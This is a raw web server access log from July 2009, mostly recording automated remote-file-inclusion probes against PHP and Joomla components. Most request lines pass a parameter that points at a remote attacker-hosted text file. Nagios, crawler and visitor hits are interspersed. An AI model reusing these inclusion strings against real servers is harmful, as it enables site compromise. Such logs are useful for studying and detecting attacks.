203.173.40.87 - - [26/Jul/2009:00:26:28 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
203.173.40.87 - - [26/Jul/2009:00:26:29 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
209.59.12.99 - - [26/Jul/2009:00:26:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:00:27:14 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.173.40.87 - - [26/Jul/2009:00:27:20 -0400] "GET /logs/access_log.Q109053100/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
80.152.243.103 - - [26/Jul/2009:00:30:07 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.152.243.103 - - [26/Jul/2009:00:30:07 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.113.221.110 - - [26/Jul/2009:00:30:11 -0400] "GET /logs/179_squarebox_pds_list/view.php?theme=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 404 234 "-" "-"
208.113.221.110 - - [26/Jul/2009:00:30:11 -0400] "GET /179_squarebox_pds_list/view.php?theme=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 404 229 "-" "-"
208.113.221.110 - - [26/Jul/2009:00:30:12 -0400] "GET /logs/access_log.Q109071600%20/179_squarebox_pds_list/view.php?theme=http://edulococrew.kit.net/id.txt?&mode=id HTTP/1.1" 404 257 "-" "-"
87.20.186.139 - - [26/Jul/2009:00:30:20 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:30:49 -0400] "GET /popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:30:49 -0400] "GET /logs/popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:30:49 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:00:31:03 -0400] "GET /logs/access_log.Q109052900////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
89.234.7.92 - - [26/Jul/2009:00:31:04 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 454 "-" "libwww-perl/5.79"
80.152.243.103 - - [26/Jul/2009:00:31:04 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:00:31:05 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 11073 "-" "libwww-perl/5.79"
66.249.68.247 - - [26/Jul/2009:00:31:16 -0400] "GET /images/_notes/home_shopping_over.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.110.74.195 - - [26/Jul/2009:00:31:35 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 11072 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:31:35 -0400] "GET /logs/access_log.Q109061400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:31:35 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:31:35 -0400] "GET /logs/access_log.Q109062500%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:31:36 -0400] "GET /logs/error_log.Q109062500%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:31:38 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:31:38 -0400] "GET /logs/access_log.Q109060100///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:31:38 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 11072 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:00:31:43 -0400] "GET /logs/access_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
209.59.12.99 - - [26/Jul/2009:00:31:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.152.243.103 - - [26/Jul/2009:00:32:10 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.152.243.103 - - [26/Jul/2009:00:32:10 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:32:25 -0400] "GET /logs/access_log.Q109071100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:32:28 -0400] "GET /logs/error_log.Q109060100///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:32:37 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:32:38 -0400] "GET /logs/error_log.Q109071100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:32:52 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:33:31 -0400] "GET /logs/access_log.Q109060100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:33:32 -0400] "GET /logs/error_log.Q109060600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:33:43 -0400] "GET /logs/access_log.Q109060600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
80.152.243.103 - - [26/Jul/2009:00:33:45 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:33:45 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:33:47 -0400] "GET /logs/error_log.Q109060100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:34:03 -0400] "GET /logs/error_log.Q109060800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:34:03 -0400] "GET /logs/access_log.Q109060800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:34:25 -0400] "GET /logs/error_log.Q109060300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:34:29 -0400] "GET /logs/access_log.Q109060300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:34:43 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:34:43 -0400] "GET /logs/error_log.Q109061100///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:34:43 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 11072 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:00:34:50 -0400] "GET /logs/error_log.Q109062100///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:35:24 -0400] "GET /logs/access_log.Q109062500///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.110.74.195 - - [26/Jul/2009:00:35:24 -0400] "GET /logs/error_log.Q109062500///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:00:36:17 -0400] "GET /logs/access_log.Q109051400//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:00:36:17 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:00:36:17 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:00:36:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.241.54.8 - - [26/Jul/2009:00:36:54 -0400] "GET /logs/access_log.Q109061600//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:37:19 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:37:49 -0400] "GET /images/_notes/home_connect_off.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:00:38:12 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
166.205.135.137 - - [26/Jul/2009:00:40:46 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 120309 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
125.241.54.8 - - [26/Jul/2009:00:41:37 -0400] "GET /logs/access_log.Q109051400%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:00:41:46 -0400] "GET /logs/access_log.Q109061600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:00:41:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.129.7 - - [26/Jul/2009:00:42:27 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:00:42:27 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:00:42:27 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:42:59 -0400] "GET /images/9600005_thumb.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
87.20.186.139 - - [26/Jul/2009:00:43:07 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:43:07 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:43:10 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:00:43:10 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:43:59 -0400] "GET /logs/access_log.Q109062600//forum4//?sourcedir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:00:44:03 -0400] "GET /logs/access_log.Q109061800%20%20/errors.php?error=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:44:24 -0400] "GET /images/_notes/banner_store_off.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.190.41.97 - - [26/Jul/2009:00:46:04 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:00:46:04 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:00:46:04 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:00:46:29 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
209.59.12.99 - - [26/Jul/2009:00:46:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.190.41.97 - - [26/Jul/2009:00:47:17 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:00:47:17 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:00:47:17 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.823"
93.190.41.97 - - [26/Jul/2009:00:48:03 -0400] "GET /logs/access_log.Q109070900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.823"
218.246.20.221 - - [26/Jul/2009:00:48:45 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:00:48:45 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:00:48:45 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:00:50:12 -0400] "GET /logs/access_log.Q109071200//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:00:50:36 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:00:50:51 -0400] "GET /logs/access_log.Q109071200%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:50:58 -0400] "GET /images/_notes/nav_store_cart_over_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.190.63 - - [26/Jul/2009:00:51:13 -0400] "GET /logs/access_log.Q109052800%20%20//skin/zero_vote/ask_password.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:00:51:25 -0400] "GET /logs/access_log.Q109070200%20%20//skin/zero_vote/ask_password.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:51:43 -0400] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:51:43 -0400] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:51:46 -0400] "GET /logs/access_log.Q109063000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:51:46 -0400] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:51:46 -0400] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:51:46 -0400] "GET /logs/access_log.Q109063000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:00:51:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.191.35.118 - - [26/Jul/2009:00:53:47 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
91.191.35.118 - - [26/Jul/2009:00:53:48 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.191.35.118 - - [26/Jul/2009:00:53:48 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
74.6.22.169 - - [26/Jul/2009:00:54:48 -0400] "GET /logs/error_log.Q109070700 HTTP/1.0" 200 2847307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.169 - - [26/Jul/2009:00:54:50 -0400] "GET /logs/error_log.Q109070700 HTTP/1.0" 200 2847307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.210.178 - - [26/Jul/2009:00:55:35 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:55:35 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:55:35 -0400] "GET /logs/access_log.Q109053000//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:00:55:41 -0400] "GET /logs/access_log.Q109070900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
122.153.28.140 - - [26/Jul/2009:00:55:54 -0400] "GET /logs/access_log.Q109063000%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:56:31 -0400] "GET /logs/access_log.Q109063000%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:56:42 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:56:47 -0400] "GET /logs/error_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:00:56:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.232.247.197 - - [26/Jul/2009:00:56:56 -0400] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.232.247.197 - - [26/Jul/2009:00:56:56 -0400] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.232.247.197 - - [26/Jul/2009:00:56:56 -0400] "GET /logs/access_log.Q109052000//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:00:57:16 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.232.247.197 - - [26/Jul/2009:00:57:24 -0400] "GET /logs/access_log.Q109060400//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:00:57:30 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:00:57:33 -0400] "GET /images/_notes/nav_store_expr_orng.jpg.mno HTTP/1.1" 200 246 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.28.140 - - [26/Jul/2009:00:57:34 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://naengjung.es.kr/bbs/DQ_LIBS/icon/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
